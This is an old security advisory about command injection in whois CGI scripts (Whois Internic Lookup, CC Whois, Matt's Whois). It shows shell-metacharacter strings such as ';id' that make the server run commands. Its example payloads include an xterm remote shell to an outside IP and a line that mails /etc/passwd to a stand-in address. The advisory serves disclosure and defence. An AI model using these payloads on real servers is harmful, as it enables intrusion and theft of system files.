COMMAND

    Whois CGI

SYSTEMS AFFECTED

    Whois Internic Lookup v1.0, CC Whois v1.0, Matt's Whois v1

PROBLEM

    Following  is  based  on  hhp  advisory.   Versions  above   allow
    execution  of  commands  due  to  lack  of  shell escape character
    parsing if  the domain  entries consist  of one  of the  following
    strings...  Note:  (Strings  will  vary  for different  vulnerable
    versions):

        1.) ;commands
        2.) ";commands
        3.) ;commands;

    Example.  If the domain entries consist of:

        1.) ;id
        2.) ";id

    or either,

        3.) ;id;

    you will see something like this:

        'Whois Server Version 1.1
        
        Domain names in the .com, .net, and .org
        domains  can now be registered with many
        different  competing  registrars.  Go to
        http://www.internic.net for detailed
        information. etc. etc. etc....
        (scroll  to  the  bottom of the output.)
        uid=501(blah) gid=500(blah)'

        ^^^^^\
              ` 'id' was executed on the server.

    Other example commands can be ran also...

        ;xterm -display ip:0.0 -rv -e /bin/sh
        ";uname -a;whoami;w;ls -al
        ;cat /etc/passwd|mail you@yourdomain.com;
        Etc, Etc.

    Alot of main *NIC* servers were found running vulnerable versions.

SOLUTION

    If you run one of these bad scripts, delete it and point your
    browser to:

        http://cgi.resourceindex.com/Programs_and_Scripts/Perl/Internet_Utilities/Whois/

    and download one of the secure packages.